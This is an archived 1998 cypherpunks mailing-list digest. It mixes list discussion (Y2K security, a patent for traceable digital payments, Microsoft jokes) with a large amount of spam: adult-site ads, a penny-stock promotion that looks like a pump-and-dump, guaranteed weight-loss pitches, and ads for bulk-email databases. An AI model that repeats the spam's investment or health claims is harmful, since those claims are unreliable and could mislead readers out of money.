http://www.scarlett.net/starter

Everyone needs legal images on their web sites these days!! 
And XXX by SCARLETT has got the pictures you need!! 

XXX RAW  EXTREME HARDCORE , BIZAARE Pics is what we specialize in!! 

Check out http://www.scarlett.net/starter 

Our specials are unbeatable and only 30 CD's are sold to Webmasters!! :D 

CD #1 - 1000+images for $500.00 (Mostly hardcore)

CD #2 - 500+images for $250.00  (ALL EXTREME HARDCORE)

CD #3 - 500+images for $250.00  (Girls with toys)

CD #4 - 626 images for $350.00 (NEW ALL HARDCORE TEEN CD) 

No one else has nasty stuff like this for this price folks!!  All images
are thumbnailed with HTML pages and come with the raw 1200x800 150dpi images.

APIC/WebPosse receive a 20% discount.  
10% discount if you purchase all four.


 ++PEACE & LOVE++


http://www.scarlett.net 
http://www.scarlett.net 
http://www.scarlett.net 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Tue, 19 May 1998 10:46:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <0b3382445171358UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: writecode

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at America Online (1.8c)"             <LISTSERV@LISTSERV.AOL.COM>
Date: Tue, 19 May 1998 08:05:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Rejected posting to CYBERIA-L@LISTSERV.AOL.COM
Message-ID: <199805191505.IAA03014@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You  are  not  authorized  to  send  mail  to  the  CYBERIA-L  list  from  your
cypherpunks@TOAD.COM account. You might be authorized  to send to the list from
another of  your accounts,  or perhaps  when using  another mail  program which
generates slightly  different addresses, but  LISTSERV has no way  to associate
this other account or address with yours. If you need assistance or if you have
any question  regarding the policy  of the  CYBERIA-L list, please  contact the
list owners: CYBERIA-L-request@LISTSERV.AOL.COM.

------------------------ Rejected message (36 lines) --------------------------
Received: from netcomsv.netcom.com (uucp1-b.netcom.com [163.179.3.1])
	  by listserv.aol.com (8.8.8/8.8.8)
	  with ESMTP id LAA20089 for <CYBERIA-L@LISTSERV.AOL.COM>;
	  Tue, 19 May 1998 11:05:16 -0400 (EDT)
Received: from ca07b8bl (pax-ca14-19.ix.netcom.com [204.31.233.83])
	by netcomsv.netcom.com (8.8.5-r-beta/8.8.5/(NETCOM v1.01)) with SMTP id IAA23186;
	Tue, 19 May 1998 08:05:12 -0700 (PDT)
Message-Id: <3.0.5.32.19980518104054.008bd710@popd.ix.netcom.com>
X-Sender: stewarts@popd.ix.netcom.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Mon, 18 May 1998 10:40:54 -0700
To: Law & Policy of Computer Communications              <CYBERIA-L@LISTSERV.AOL.COM>,
        CYBERIA-L@LISTSERV.AOL.COM
From: Bill Stewart <cypherpunks@toad.com>
Subject: Re: regulating speech (was: DNS)
In-Reply-To: <3.0.16.19980515115128.34271d5c@pop.radix.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

At 12:41 PM 5/15/98 -0400, Donald Weightman wrote:
>I wonder if  LEBRON V. AMTRAK is relevant here.  There the Court extended
>the First Amendment to corporations created by, and under the control of,
>the government in the case of an artist who argued successfully that Amtrak
>had been wrong to reject his billboard display because of its political
>message.
>
>The devil is in the details -- of InterNIC's creation and operation, vs.
>Amtrak's.

The Supreme Court just decided that Tax-funded radio/tv stations
don't have to include all candidates for an office in their debates
if they don't feel like it, based on First Amendment reasons.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 19 May 1998 08:42:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA & y2k
Message-ID: <199805191542.LAA10584@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarding...
---guy

>  From owner-ignition-point@majordomo.pobox.com Tue May 19 10:29:02 1998
>  Subject: IP: NSA concerns could hamper DOD Y2K fix

Source:  Federal Computer Week
http://www.fcw.com/pubs/fcw/1998/0518/fcw-frontnsa-5-18-1998.html

 NSA concerns could hamper DOD Y2K fix

 BY BOB BREWIN (antenna@fcw.com)
 HEATHER HARRELD (heather@fcw.com)
 DANIEL M. VERTON (dan_verton@fcw.com)

 The National Security Agency has slapped a security blanket on the
 Pentagon's efforts to fix the Year 2000 millennium bug, which could further
 slow the Defense Department's already-behind-schedule Year 2000 fixes.

 NSA has determined that all information detailing DOD's computers and its
 efforts to fix the Year 2000 problem are a "national security interest" and
 "highly sensitive." As a result, the Pentagon has cut off the military
services
 and DOD project offices from the Defense Integrated Support Tool (DIST)
 database, which the Defense Information Systems Agency maintains to
 provide details on all DOD computer systems and interfaces for use in
 planning and deployment.

 DIST, according to DISA, is a database of some 9,000 DOD systems that
 the department uses to track such key areas as system interfaces, compliance
 with high-priority standards, interoperability testing, consolidation
goals and
 Year 2000-compliance planning. DIST was seen as critical to the Year 2000
 problem because it provides a central source of information about interfaces
 between different DOD systems, which is a chief concern of Year 2000
 conversion efforts.

 DOD began using DIST to track Year 2000 compliance in August 1996, and
 a Dec. 19, 1997, memo from the Office of the Secretary of Defense to DOD
 chief information officers identified DIST as the "central, authoritative
 database for tracking resolution of the Year 2000-related problems for
 systems throughout the department."

 That aggregation of extensive details about Year 2000 problems with DOD
 systems poses a threat to national security, according to NSA.

 "The DOD's Y2K conversion effort is a national security interest," NSA
 reported in a statement supplied to FCW. "All information detailing these
 information systems and the progress being made toward their conversions is
 considered to be highly sensitive."

 DOD is not trying to cover up information about its Year 2000 efforts, a
 DOD spokeswoman said. "We couldn't hide what we're doing if we wanted
 to, and we certainly don't want to," she said. "The idea is to move these
fixes
 along at the fastest possible clip but not to jeopardize other security
measures
 as we do it."

 While industry and service sources said they could understand NSA's security
 concerns, they said the classification could hobble the Pentagon's
 already-delayed Year 2000 remediation efforts. One former high-ranking
 DOD official described the classification issue as symptomatic of what he
 called the Pentagon's "gross mismanagement" of Year 2000 issues.

[snip of 90 lines]

**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Tue, 19 May 1998 11:11:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: AOL Top Story
Message-ID: <8688e6ed.3561cae5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hackers Tell About Security Woes

WASHINGTON (AP) - Computer hackers told Congress today that computer security
is so lax, they could disable the entire Internet in a half-hour. Members of
the hacker think-tank called ``The Loft,'' who were praised by senators for
calling attention to the problems of computer security, also warned that they
could transfer Federal Reserve funds by computer and disrupt electrical power.
One hacker, identified by his online handle ``Mudge,'' told the Senate
Governmental Affairs Committee ``if you're looking for computer security then
the Internet is not the place to be.''




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: investorsedge@mci2000.com (SunGroup)
Date: Tue, 19 May 1998 15:33:58 -0700 (PDT)
To: investorsedge@mci2000.com
Subject: 90 Day Trial Offer: Day Trades/Growth/Blue Chips/Penny Stocks
Message-ID: <199805182644SAA35444@rush.provo.novell.com>
MIME-Version: 1.0
Content-Type: text/plain


5/18/98
Dear Investor.  Investors Edge is offering a 3-month subscription free. 
Investors Edge is a Newsletter that searches out timely undervalued and special situation investment opportunities.  From Day Trades to high growth companies.  Once you see your returns that you make from our advice, we are confident you will sign up for a full subscription. You have nothing to lose except timely investment opportunities.

Join the rank of those savvy investors who get insights into little known,
high growth companies and accurate market timing for day traders that have the realistic potential to post substantial price gains in the near future.

Click or type here : http://www.investorsedge.net

www.investorsedge.net
Here is a sample of a Market Alert.

Power Technology, Inc. Years Ahead of it's competitors
5/18/98 Market Alert

Power Technology PWTC (OTC: BB: PWTC) Time to start to accumulating. We have learned that the company is about to have a major event. Here is a brief description of the company.

Power Technology's (OTC BB:PWTC), principal offices and laboratory are located at 1000 West Bonanza Rd. Las Vegas, Nevada 89106.  The centrally located warehouse, laboratory, office structure, owned by Alvin Snaper, is a two-story 30,000 square foot building.  The Company utilities 5,000 square feet for the development and testing battery technology for electric automobiles and other uses.

Current technology in the automotive battery industry utilizes a 6 to12 volt battery system that employs standard electro-plates with lead-acid chemistries.  Power Technology has developed with already proven technology, a batter that substantially lighter than the conventional battery and also have a quicker re-charge rate and will be more cost effective. Because this new technology does not use lead, this product will be environmentally friendly.

The potential market for the new Power Technology battery could be any application that utilizes the conventional lead-acid technology. Also the current target market for Power Technology's battery will be the new environmentally friendly electric car.  Until recent amendments postponed legislation, the California Air Resources Board decreed that 2% of vehicles sold in California by major automakers must meet a zero-emissions vehicle standard by the year 1998.  By the year 2003, 10% of automakers sales mix in California must be electric. In addition clean-air-regulators in a dozen Northeastern states and Washington, DC are considering adopting the same air-quality standards as in California, which could result in an electric vehicle mandate covering roughly 40% of the US car and light-truck market.

The electric cars produce to-date have battery packs that last between 25,000 and 30,000 miles and require a two to three hour recharge using a 220-volt outlet or six to 10 ten hour recharge using a 110-volt outlet and cost about $2000 to $2,500 to replace. Still, these operating and recharge statistics only apply to electric cars or batteries operating at room temperature.  At higher temperatures, like those found on sun-soaked asphalt highways (approximately 50% of North America), battery life is drastically diminished.  Currently electric cars will carry two people about 50 miles on a hot day.  With this kind of performance the consumer will be very limited to where and how far they are able to drive.

The Battery that Power Technology has developed will let a consumer drive approximately 250 miles one a normal charge. The recharge time on a 110-volt outlet is approximately 3 hours. The Power Tech battery also does not contain any harmful materials.  

Two weeks ago I saw a prototype of the Battery and spoke to the inventor, Mr. Alan Snaper. The company currently has about $500.000 in the bank and is in discussions with several major companies and governmental agencies regarding this product. Currently Power Technology (OTC.BB) trades around 5 dollars a share.  The company just recently started to trade.  In my opinion Power Technology is undervalued. I believe this company will do very well in 1998. This is one of those undiscovered, overlooked companies on Wall Street. I really can't even project the potential of this company.  10 to 15 a share by the end of 1998 is extremely conservative.
Take a look at the management. The stock should be 10 just based on the management's resume. 

Management: Alvin A. Snaper, is the company's vice-president of development and the project coordinator for the new technology.  He has been engaged in scientific research and development of products and processes for 30 years. His well known inventions include the IBM Selectic Ball, Tang (the Orange drink), the NASA Apollo Photo-pack and a line of industrial hard coatings currently used by companies such as Gillette, Boeing, TRW, Vermont-American, Gulf Western and many others. Mr. Snapper currently holds 600 U.S. and foreign patents, products and processes. Mr. Snaper is the only inventor to receive the Design News Magazine Best Patent of the Year award for three separate years. In fact he is the only individual to receive more than one such citation.

Charles Warn is the Chief chemical engineer for the project.  He has over 40 years experience in development and project engineering and design expertise in a variety of different disciplines.  His past experience includes working with General Motors and Parker-Hannifin with high performance aircraft fuel systems.

Chances are that one of the big three automakers will buy out Power Technology.
Due to no exposure in the financial industry, Power is undiscovered and a screaming buy.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka-help@eureka.abc-web.com
Date: Tue, 19 May 1998 08:42:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Successful Subscription
Message-ID: <895592559.16954.ezmlm@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


WELCOME TO EUREKA!
==================
Congratulations,  your free subscription to the Eureka!
newsletter is now set up. We hope you enjoy every copy.
As promised,  while you wait  for your first newsletter
here are the links to  the FREE videos and FREE photos!

BIENVENUE  EUREKA!
===================
Flicitations,  votre abonnement  libre   l'Eureka! le
bulletin  est  maintenant install.  Nous esprons  que
vous  apprciez chaque copie.  Comme promis,  alors que
vous attendez votre premier bulletin ici sont les liens
aux videos LIBRES et aux photos LIBRES!

WILLKOMMEN ZU EUREKA!
=====================
Glckwnsche,   Ihre  freie  Subskription  zum  Eureka!
Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
da Sie jedes  Exemplar genieen.  Wie, whrend Sie Ihr
erstes Rundschreiben hier warten, sind die Links zu den
FREIEN videos und zu den FREIEN Fotos versprochen! 

RECEPCIN A EUREKA!
===================
Felicitaciones,  su  suscripcin  libre  al  Eureka! el
boletn  de   noticias  ahora  se  fija   para  arriba.
Esperamos  que  usted  goce  de  cada  copia.  Segn lo
prometido,  mientras que usted espera su primer boletn
de noticias aqu son las conexiones a los videos LIBRES
y a las fotos LIBRES!

BENVENUTO A EUREKA!
===================
Congratulazioni,   il  vostro  abbonamento   libero  al
Eureka!  il bollettino  ora  installato.  Speriamo che
godiate ogni copia.  Come promesso, mentre aspettate il
vostro primo bollettino qui sono i collegamenti ai vid-
eos LIBERI ed alle foto LIBERE!

BOA VINDA A EUREKA!
===================
Felicitaes, sua subscrio livre ao Eureka! o boletim
de notcias  ajustado  agora acima.  Ns esperamos que
voc aprece cada cpia.  Como prometidas,  quando voc
esperar seu  primeiro boletim  de notcias aqui  so as
ligaes aos videos LIVRES e s fotos LIVRES!

=======================================================
FREE hardcore videos ........ http://www.slutorama.com/
FREE hardcore photos .... http://209.50.232.36/desires/
=======================================================

The following lines identify the source of this subscription
request,  including date/time,  IP number and  browser used.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kie25@msn.com
Date: Tue, 19 May 1998 17:34:28 -0700 (PDT)
To: kie25@msn.com
Subject: A DIRTY LITTLE JOKE!!!
Message-ID: <199805191585RAA15856@server.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><FONT  SIZE=3 PTSIZE=10>| ------------------WWW.THEDIRTYJOKE.COM------------------ |    
|This filthy joke was brought to you by the wonderful folks|    
|at WWW.THEDIRTYJOKE.COM ... Feel free to send this joke   |    
|to anyone you think might get a kick out if it ... and for|    
|more great jokes visit WWW.THEDIRTYJOKE.COM ...           |    
| ------------------WWW.THEDIRTYJOKE.COM------------------ |    
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||    
     
    
The other day I was out playing some golf ... and my ball    
landed on the rough in a patch of buttercups.  As I lifted    
my club in the air I heard a faint voice ... "Please don't    
hurt my buttercups, buttercups."  I lowered my club and took    
a quick glance back and forth to make sure that I was alone.    
Satisfied that I was alone, I began to raise my club ... and    
again came the same voice, this time a bit louder, "Please    
don't hurt my buttercups, buttercups."  This time I was so    
sure of the voice that I spoke aloud, "Hello, is someone out    
there." No sooner than I had finished speaking a tiny fairy    
appeared before me.  "I am the forest fairy, if you don't    
hurt my buttercups then I'll give you all the butter you    
could want for the rest of your life." and so I replied ...    
"Where the hell where you when I was in the pussywillows?"    
     
    
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||    
| -----------------WWW.EROTICBOXOFFICE.COM---------------- |    
|If you're looking for the sexiest women on the net, you   |    
|should start you're hunt at WWW.EROTICBOXOFFICE.COM ... We|    
|have the youngest, most adorable girls you'll ever see!   |    
|And you won't find 'em anywhere else ...                  |    
| ------------------THE HUNT STARTS HERE------------------ |    
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||    
</HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: She Devil With A Modem <redsonja@liii.com>
Date: Tue, 19 May 1998 20:08:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Suit with braindead tie
Message-ID: <199805200308.XAA06738@rowan.liii.com>
MIME-Version: 1.0
Content-Type: text/plain



Also Sprach Anonymous:
> 
> time.com / The Netly News
> May 19, 1998
> 
>        There was blood in the water in Washington, DC yesterday, and
>    Microsoft's foes hardly had a chance to rejoice over the government's
>    anticipated antitrust lawsuit before they were asking for more.
>    Longtime Microfoe Gary Reback, an attorney with the Silicon Valley law
>    firm Wilson Sonsini Goodrich & Rosati, still thinks breaking up
>    Microsoft AT&T-style would be a good idea. At a press conference
>    yesterday, Sen. Orrin Hatch (R-Utah) predicted the lawsuit "will
>    become even broader. I have no doubt about that." Netscape dubbed it a
>    welcome but only an "initial step."
>    
> [...remainder snipped...]

I wonder if anyone else has picked up on the "Braindead military 
action" of awarding Microsoft the dubiously coveted intelligence 
desktop? It may not be as braindead as you think.

Yes, if standard kickbacks and BS occur as they have in the past
(those who are not free to speak about the mistakes of the past 
may be doomed to see them repeated) then technical support for
the poor troopies required to maintain the shitty, buggy NT ports
may end up making "Blue Screen Of Death" have an entirely new and
sad meaning. It's sad that the lack of the intelligence community's
desire to police itself as much as it would like to police America's
generic civilians results in the sort of kickbacking that yields
inferior weaponry, but I guess if they don't address that it will
end up biting them in the ass. And yes, that is indeed indicative 
of a braindead military, led by the supreme oxymoron of a braindead
military intelligence community, where the dutiful are asked to 
turn their eyes away (for reasons of classification, of course)
from the acts of the greedy. 

But assume for a moment that it might be the military and not M$oft
that holds the leash on the contract. Imagine a Microsoft that 
has sold it's soul to the US Intel community. Couldn't happen to a
nicer company, don't you think? Microsoft HAVING to port their NT
stuff to the Unix boxes that hold the databases and the communications
servers. Microsoft HAVING to provide a certain amount of "mission 
critical" tech support. Microsoft HAVING to deal with adapting to 
the real world, rather than forcing the world to adapt to it.

This could be the beginning of a beautiful "friendship". >;-7

-- 
"Good evening, Mr. Burglar! My name is Jowles!   | Do not           CD  c
 Would you care for a cocktail before I attempt  | taunt --------P===\==/
 to intimidate you with my aggressive behavior?" | happy fun         /_\__
                     -- Miss Manners' Attack Dog | fencer!             _\ \
S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 May 1998 20:17:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Chaum's patent on traceable payment systems
In-Reply-To: <v03102803b187b714a118@[24.234.31.56]>
Message-ID: <199805200317.XAA29396@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Chaum's "limited-traceability" patent includes other features
which directly counterbalance those of the Abstract accurately 
posted by Anonymous.  We've transcribed the initial sections of the
17-page patent which provide a fuller view of what his system 
offers:

   http://jya.com/chaum-lts.htm  

It's an interesting, nuanced proposal, from 1994, which helps
explain some of the strategy he's been keeping close to his 
chest until patent approval, and which may portend more 
provocative designs in the pipeline for outfoxing the keepers
of the chickens.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Tue, 19 May 1998 20:40:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: 'Nobody', Still At Home!
Message-ID: <7272bfd8.3562508e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/19/98 10:09:01 PM Central Daylight Time,
mixmaster@remail.obscura.com writes:

<< Stan, It is considered rude to quote a private e-mail publicly without
obtaining permission from the sender first.  Try putting "netiquitte" in your
favorite search engine.  Then read and learn.  This will help you. >>

Gee, like sending anonomous, unsolicited e-mail isn't against "netiquitte"?
Try taking that "plank" out of you eye, buddy!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 36997526@giselp.com
Date: Wed, 20 May 1998 01:29:10 -0700 (PDT)
To: Friend@public.com
Subject: Secrets To Losing Weight Right Now and Keeping It Off Forever!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Are You Serious About Losing Weight Right Now?
If you are, please continue.
If not, we apologize for the intrusion.

You can slim down right now using Five Simple Techniques taught by experts around the world.

It's been tested and guaranteed effective 98.2% to work with just about anyone.  It doesn't matter who you are or if you have dieted and failed before.  This program is 100% guaranteed.  It's safe for anyone, and any age.

Imagine,  getting down to that perfect dress size, or fitting into those jeans that just don't want to go on anymore.

You can lose those unwanted pounds right now without the use of:

	Expensive Diet Pills
	Awful Tasting Diet Shakes
	or, just plain starving yourself.
	And best of all, It's perfectly safe!


Summer is almost here. So say goodbye to YoYo Diets forever.

It's time to start a new You!

For Free Information on shaving those unwanted pounds safely, email us at:
weightloss@giselp.com

We guarantee you'll have a new attitude!

Please pardon our intrusion.  To be removed, Click reply and type "Remove" in Subject box and you will be permanently removed from any future mailings.


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: out@sex-e-world.com
Date: Wed, 20 May 1998 01:46:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Adults Only
Message-ID: <199805200859.BAA15075@ns1.1connect.com>
MIME-Version: 1.0
Content-Type: text/plain



This message is intended for those over the age of 18.  If you are under the age of 18
click your delete key now!

Click into gigabytes of pure hardcore.-  Secure Instant Online Access
http://www.sex-e-world.com/

Free 3 day trial membership





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nuw@mail.usa.com
Date: Wed, 20 May 1998 10:22:55 -0700 (PDT)
To: code5454@aol.com
Subject: The market is wide open
Message-ID: <199805201719.NAA07700@pop01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"></P><P ALIGN=CENTER><FONT COLOR="#dafefe" SIZE=3>||||||</FONT><FONT COLOR="#000000" SIZE=3>
<FONT COLOR="#ff8080" SIZE=3>(</FONT><FONT COLOR="#0000ff" SIZE=3>o o</FONT><FONT COLOR="#ff8080" SIZE=3>)</FONT><FONT COLOR="#000000" SIZE=3>
<FONT COLOR="#ff8080" SIZE=3>oOOo-(_)-oOOo
</FONT><FONT COLOR="#c0c0c0" BACK="#ff0000" SIZE=3>___|___|___|___|___|
___|___|___|___|___|
</FONT></FONT><FONT COLOR="#000000" BACK="#FFFFFF" SIZE=3> Just popping over to say...

<FONT COLOR="#00ffff" SIZE=3><B>Online Marketers Visit Us On The World-Wide-Web

 </B>http://www.fontaineonline.com/sawtell<B> </B>

<FONT COLOR="#00ffff" SIZE=3><B>Bulk Email Software</FONT><FONT COLOR="#ff0000" SIZE=3>
Bulk Friendly Web Hosting
</FONT><FONT COLOR="#00ffff" SIZE=3>Bulk Friendly Email Accounts (incoming & outgoing)</FONT><FONT COLOR="#ff0000" SIZE=3>
Bulk Friendly ISP

</FONT><FONT COLOR="#00ffff" SIZE=3>Email Address Databases !!</FONT><FONT COLOR="#ff0000" SIZE=3>
Bulk Email Delivery Service

 </B>http://www.fontaineonline.com/sawtell<B>
 
<FONT COLOR="#00ff00" SIZE=3> Our Site is best viewed with
 <FONT COLOR="#00ff00" BACK="#004080" SIZE=3>Netscape 3.0</FONT><FONT COLOR="#00ff00" BACK="#FFFFFF" SIZE=3>
                                               </B><HTML><PRE>
<FONT COLOR="#ebebeb" BACK="#ebebeb" SIZE=1





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 20 May 1998 20:53:10 -0700 (PDT)
To: "jf_avon@citenet.net>
Subject: Humor...
Message-ID: <199805210400.AAA10425@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>                     WHERE AM I?
>              ------------------------------------
>A helicopter was flying around above Seattle yesterday when
>an electrical malfunction disabled all of the aircraft's electronic
>navigation and communication equipment. Due to the clouds and haze
>the pilot could not determine his position or course to steer to
>the airport. The pilot saw a tall building, flew toward it, circled,
>drew a handwritten sign and held it in the helicopter's window. T
>he sign said "WHERE AM I ?" in large letters.
>
>People in the tall building quickly responded to the aircraft,
>drew a large sign and held it in a building window. Their sign said,
>"YOU ARE IN A HELICOPTER.' The pilot smiled, waved, looked at his
>map and determine the course to steer to SEATAC
>(Seattle/Tacoma) airport and landed safely.
>
>After they were on the ground, the co-pilot asked the pilot how
>the "YOU ARE IN A HELICOPTER" sign helped determine their
>position. The pilot responded, "I knew that had to be the
>MICROSOFT building because they gave me a technically correct
>but completely useless answer."

Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 6YqDi2e7N@alwret.com
Date: Thu, 21 May 1998 01:32:16 -0700 (PDT)
To: DEAR, FRIEND@pm05sm.pmm.mci.net
Subject: LOSE FAT/BUILD MUSCLE: USE CREATINE
Message-ID: <fiwer@jjfed.com>
MIME-Version: 1.0
Content-Type: text/plain


____________________________________________________________________________
THIS IS A ONE TIME MAILER!
____________________________________________________________________________


In appreciation for accepting this e-mail, we would like to invite you to
take the next step in enhancing your health, physique, and strength:

**Retail Outlets, Wholesalers, Distributors, Coaches, Trainers, Fire/Police Departments Welcome
   (Please scroll to bottom of page for more info.)**

                                              UNBEATABLE PROMOTION!

THE NEWS IS OUT.......

                                           **CREATINE MONOHYDRATE: **
IS A METABOLITE THAT FUNCTIONS AS A PRECURSOR TO CREATINE PHOSPHATE.  ONCE
CONVERTED TO CREATINE PHOSPHATE IT PROVIDES A HIGH ENERGY PHOSPHATE
MOLECULE FOR ATP PRODUCTION.  ATP (ADENOSINE TRI PHOSPHATE) IS THE CHEMICAL
IN OUR BODIES THAT FUELS ALL MUSCULAR CONTRACTIONS.  WITH HIGHER AMOUNTS OF
ATP AVAILABLE,  YOU WILL PUSH HEAVIER WEIGHTS,  EXERCISE HARDER WITHOUT
FATIGUE, AND RIP THROUGHOUT YOUR WORKOUTS!  CREATINE'S ROLE,  COUPLED WITH
TRAINING INFLUENCES MUSCULAR CONTRACTION,  CELL HYDRATION,  STRENGTH, 
ENDURANCE AND ULTIMATELY,  LONG TERM MUSCULAR GROWTH.  AS LITTLE AS 5-10
GRAMS TAKEN PRIOR TO WORKING OUT WILL INTENSIFY YOUR TRAINING SESSIONS LIKE
NOTHING THAT'S AVAILABLE ON THE MARKET TODAY. 

                                                       "BUYER BEWARE"
UNFORTUNATELY THERE ARE MANY UNSCRUPULOUS SUPPLEMENT COMPANIES OFFERING
CREATINE THAT HAS BEEN CUT IN HALF BY ADDING  MALTODEXTRINE (A COMPLEX
CARBOHYDRATE).  WE SELL ONLY 100% PURE  CREATINE (PHARMACEUTICAL GRADE
AMERICAN MADE/HPLC TESTED).  

WE GUARANTEE IT OR YOUR MONEY BACK!

**UP TO 60% BELOW RETAIL PRICES***

COME SEE WHY THOUSANDS SAVE WITH US AND WHY WE ARE THE #1 HEALTH AND
NUTRITION COMPANY ON THE INTERNET........

1100 g. OF PURE CREATINE:   $69.99  (COMPARE TO $120: SAVE UP TO 50%)
(2.4 lbs./4 MONTHS SUPPLY) NO LIMIT!

PACKAGE PRICES:

"BIG3"
(IF YOU NEED TO LOSE THE FAT AND GAIN LEAN MUSCLE)      
(3 MOS. SUPPLY/CREATINE-CLA-CARNITINE SUGGESTED PRICE: $220)
ON SALE: $139.99 YOU SAVE $80!
**Order now to receive an additional $40 in free gifts**

"MUSCLE MAXX"
(IF YOU ARE LEAN BUT NEED TO ADD MORE MUSCLE)
(3 MOS. SUPPLY/CREATINE-GLUTAMINE-TAURINE SUGGESTED PRICE: $200
ON SALE: $129.99 You SAVE $70!
**Order now to receive an additional $40 in free gifts**

TOLL FREE IN THE USA: 1- (800) 933-5043
CALL: 1-(714) 770-0750 (FOR NATIONAL & INTERNATIONAL CALLERS)

OR
http://206.67.54.156 
<a href="http://206.67.54.156">
CLICK HERE</a> TO VISIT THE #1 HEALTH/FITNESS SECURE WEB-PAGE AND GET MORE 
DETAILS ON OVER 50 OTHER PRODUCTS+200 MORE EXPECTED BY SUMMER OF 98' 
(0RDER ONLINE 24HRS/7DAYS A WEEK)!


ATTN:  RETAIL STORE OWNERS/ NATIONAL & INTERNATIONAL DISTRIBUTORS ONLY: 
CARRY OUR PRODUCTS AND WE WILL ADVERTISE YOUR STORE/STORES FOR "FREE" ($400
VALUE PER MONTH/ PER STORE) ON OUR WEB-SITE UNDER "RETAIL STORES NEAR YOU".
 PLEASE VISIT OUR WEB-SITE FOR MORE INFORMATION.  NOW WHAT SUPPLEMENT
COMPANY GIVES YOU THAT KIND OF PRODUCT SUPPORT AND MARKETING????  DON'T LET
THIS OPPORTUNITY PASS YOU BY....CALL (714) 583-1975 TO GET YOUR STORE
WHOLESALE PRICES AND VOLUME DISCOUNTS! 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew T Darling <darl0006@tc.umn.edu>
Date: Thu, 21 May 1998 11:22:21 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Re: programing
In-Reply-To: <19980522.120339.3414.0.josh434@juno.com>
Message-ID: <Pine.SOL.3.96.980521132026.23187D-100000@garnet.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I prefer Ada, Apple's MLX, basic, and Logo.  At times i also like to
program in machine language.  

;)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sextracash@pleasureclub.com (Sextra Cash)
Date: Thu, 21 May 1998 13:54:46 -0700 (PDT)
To: sextracash@pleasureclub.com
Subject: Does your site offer free content?
Message-ID: <v02130516b18a2ac875fd@[204.0.16.68]>
MIME-Version: 1.0
Content-Type: text/plain


Hello Adult Webmaster,

It's one thing to get a surfer to visit your site once.  But that's not
where the money is.  You have to find a way to get your visitors to come
back again and again.  Build a clientelle.

We have found that the sites that offer "of the day" pics are the most
successful in building a loyal following.  Changing pictures everyday,
though, can be tedious and expensive.  So, to help you build your site,
we are offering FREE CONTENT!

SextraCash has just introduced a new way to bring surfers back to your
site EVERYDAY.

Introducing the DAILY SEXPACK.

